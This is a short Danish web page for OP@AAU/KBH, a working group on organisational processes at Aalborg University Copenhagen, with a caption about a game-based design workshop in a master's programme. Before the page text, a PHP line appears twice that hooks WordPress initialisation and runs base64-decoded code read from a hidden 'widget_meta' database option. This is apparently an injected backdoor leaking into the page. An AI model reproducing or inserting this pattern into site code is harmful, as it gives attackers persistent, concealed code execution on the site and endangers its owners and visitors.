add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); OP@AAU/KBH - procespsykologi

OP@AAU/KBH

Arbejdsgruppen Organisatoriske Processer (OP) på Aalborg Universitet, København.

Billedet er lånt fra en undervisningsgang på kandidatuddannelsen i It, læring og organisatorisk omstilling hvor de studerende arbejdede med at udvikle spilbaserede læreprocesser til løsning af opgave om organisatorisk silodannelse.

Designworkshop på kandidatuddannelsen It, Læring og Organisatorisk Omstilling på AAU

Designworkshop på kandidatuddannelsen It, Læring og Organisatorisk Omstilling på AAU